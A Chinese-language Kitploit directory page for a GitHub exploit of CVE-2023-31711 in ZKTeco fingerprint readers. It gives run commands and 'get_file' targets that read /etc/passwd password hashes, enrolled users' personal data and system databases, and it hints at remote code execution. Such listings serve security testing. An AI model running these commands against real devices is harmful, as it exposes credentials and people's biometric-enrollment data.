Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-31711 — ZKTEco生物识别指纹读取器中的零日漏洞 | Kitploit
工具/GitHubGitHub/hritikthapa7/cve-2023-31711
漏洞分析漏洞利用Web应用程序漏洞利用数据泄露信息收集渗透测试
GitHubhritikthapa7/cve-2023-31711

CVE-2023-31711

ZKTEco生物识别指纹读取器中的零日漏洞

查看仓库
2223年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-31711

ZKTECO 中的访问控制不当允许远程攻击者通过管理 API 读取任意文件。

安装所需模块

  • 在 ZKTEco 目录中: $ pip install -r ./pyzatt/requirements_dev.txt

运行漏洞利用

  • 在 ZKTEco 目录中: $ python exploit.py <ip_address> Connected to 10.0.2.25
    (Cmd) get_file <file_name>
    示例: get_file /etc/passwd:泄露 root 密码的哈希 get_file /mnt/mtdblock/data/ZKDB.db:泄露已注册用户的个人身份信息(PII)。要读取内容,你可能需要按顺序多次运行此命令,直到全部内容泄露完毕 get_file /mnt/mtdblock/data/ZKSystem.db:泄露与系统相关的敏感信息

致谢

漏洞利用:https://github.com/ProCheckUp/SafeScan

Pyzatt 模块:

https://github.com/adrobinoga/pyzatt

注意

这些设备也可能通过管理 API 存在远程代码执行漏洞。致谢部分提到的漏洞利用可能是寻找相应测试的好起点。

下载工具